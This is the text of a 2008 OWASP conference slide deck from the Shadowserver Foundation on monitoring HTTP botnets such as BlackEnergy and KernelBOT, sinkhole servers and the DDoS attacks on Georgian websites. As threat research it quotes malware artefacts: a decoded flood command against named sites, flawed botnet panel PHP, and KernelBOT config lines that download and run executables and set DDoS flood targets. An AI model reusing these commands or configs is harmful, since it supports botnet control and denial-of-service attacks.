Professional Documents
Culture Documents
OWASP Asia 2008 Steven
OWASP Asia 2008 Steven
Steven Adair
The Shadowserver Foundation
steven@shadowserver.org
OWASP
October 28, 2008
Shadowserver
Definitions
Command and Control (C&C)
HTTP Botnets: Case Studies & Monitoring
BlackEnergy
KernelBOT*
Sinkhole Server
Georgian DDoS Attacks (time permitting)
OWASP 2
Shadowserver
OWASP 3
Definitions
OWASP 4
Process Flow
OWASP 5
OWASP
Shadowserver Generated Custom Reports
Report Types •Recipients
DDoS Public IRC Services
C&C List Emerging Threats Snort
Compromised Host DNS Registrars
Click-Through Fraud Commercial Vendors
Drones
40+ CERT's
Proxies
URL Report ASN Owners
Spam 2300+ CIDR Owners
Filters 7 International LEO's
ASN
5 International Critical
CIDR/IP Ranges Infrastructure Groups
Country Code (example: TW)
OWASP 7
Shadowserver Generated Custom Reports
OWASP 8
Shadowserver Reports: Cost ($$)
OWASP 10
Botnets – Not Just IRC Anymore?
OWASP 11
Botnets – Most Popular C&C Mechanism
OWASP 12
HTTP Botnets – Benefits?
OWASP 13
HTTP Botnets – Types & Uses
OWASP 14
HTTP Botnets:
Case Studies & Monitoring
OWASP 15
BlackEnergy
OWASP 17
BlackEnergy – Client POST
HTTP/1.1 200 OK
Date: Sat, 10 May 2008 16:26:54 GMT
Server: Apache/2.2.8 (EL)
X-Powered-By: PHP/5.2.5
Content-Length: 184
Connection: close
Content-Type: text/html
MTA7MjAwMDsxMDswOzA7MzA7MTAwOzM7MjA7MTAwMDsyMDAwI2Zb
29kIGh0dHAgd3d3LnJ1c3NpYW5jYXNpbm8ucnUsZG9zdWd2aXA
ucnUsd3d3LnctNzc3LmNvbSxpbnRyYWRheWludmVzdG1lbnRnc
m91cC5jb20gYWNjb3VudC5waHAjNSM
Decodes to
10;2000;10;0;0;30;100;3;20;1000;2000#flood http
www.russiancasino.ru,dosugvip.ru,www.w-
777.com,intradayinvestmentgroup.com
account.php#5# OWASP 18
BlackEnergy – Gambling Attack
OWASP 19
BlackEnergy – Gambling Attack
OWASP 20
BlackEnergy – Gambling Attack
OWASP 21
BlackEnergy – Bad Coding
if ($login)
{
Sleep(1);
if ($luser == $user && $lpass == $pass)
{
setcookie(”<removed>", $pass);
header("location: index.php");
}
} else {
<removed>
if (<removed> === $pass)
{
<removed> = true;
}
}
OWASP 22
BlackEnergy – Login Screen
OWASP 23
BlackEnergy – Add N Edit Cookies
OWASP 24
BlackEnergy – Bad Coding Results
OWASP 25
BlackEnergy – More Fun Code
$id = addslashes($_POST['id']);
$build_id = addslashes($_POST['build_id']);
…
$sql = "REPLACE INTO `stat`
(`id`, `build_id`, `files`, `ip`, `last`, `country`,
`country_full`)
VALUES
('$id', '$build_id', '".serialize($files)."', '$addr',
'".time()."', '{$country['country']}',
'{$country['country_full']}')";
db_query($sql);
OWASP 26
KernelBOT
OWASP 27
KernelBOT Config/Command File
OWASP 28
KernelBOT Config: Version Tracking
[UpdateServer]
NewVersion=20080711
UpdateFileUrl=
OWASP 29
KernelBOT Config: Stats and Downloads
[KernelSetting]
IsReportState=1
ReportStateUrl=http://<removed>.com/kernel/zz.htm
IsDownFileRun0=0
DownFileRunName0=iexp1ore.exe
DownFileRunUrl0=http://<removed>.com/download/w
ebcc.exe
SuperDownFileRunUrl9=http://<removed>.vicp.net/do
wnload/Loader.exe
OWASP 30
KernelBOT Config: DDoS
[DDOS_ScriptFlood_A1]
IsScriptFlood=0
CmdID=60
ScriptFloodUrl=/Discuz!/viewthread.php?tid=220479&extra=
page%3D1
ScriptFloodDNS=bbs.vsa.com.cn
ScriptFloodPort=80
IsGetUrlFile=0
ThreadLoopTime=2000
ThreadCount=1
IsTimer=1
Timer=6000
OWASP 31
KernelBOT: Recent Attacks
OWASP 32
HTTP Botnets – Monitoring
OWASP 34
Malicious Domains
OWASP 35
Malicious Domains Continued
OWASP 36
Why Register the Domains?
OWASP 38
Sinkhole Server Logging
OWASP 39
Sinkhole Server Explained: Pretty Picture
OWASP 40
Sinkhole Server: HTTP Accesses
+-------------------+--------------+-----------------------+------------------------+---------------+--------------+
| Total HTTP Hits | Unique IP's | Unique HTTP Agents's | Unique HTTP Referer's | Unique ASN's | Unique GEO's |
+-------------------+--------------+----------------------+------------------------+---------------+--------------+
| 29,020,033 | 256,424 | 4,824 | 1,067 | 3,550 | 159 |
+-------------------+--------------+-----------------------+------------------------+---------------+--------------+
OWASP 41
Georgian DDoS Attacks
OWASP 42
HTTP Botnet Targets Georgian President
OWASP 43
HTTP Botnets - Machbot Controller
OWASP 45
.ge Websites Heavily Targeted
OWASP 46
.ge Websites Heavily Targeted Cont’d
OWASP 47
HTTP Botnets Called to Action
OWASP 48
Botnet Targeted Sites
www.president.gov.ge hacking.ge
www.parliament.ge os-inform.com
news.ge mk.ru
apsny.ge www.skandaly.ru
newsgeorgia.ru www.kasparov.ru
tbilisiweb.info
OWASP 50
Not the Russian Government?
OWASP 51
Remember Estonia?
OWASP 52
Grass Roots Efforts
OWASP 53
Grass Roots Efforts Cont’d
OWASP 54
Grass Roots Efforts Cont’d
OWASP 55
Conspiracy Theories Dispelled
OWASP 56
Conspiracy Theories Dispelled
OWASP 57
Thank You! 谢谢
steven@shadowserver.org
Our website:
http://www.shadowserver.org
OWASP 58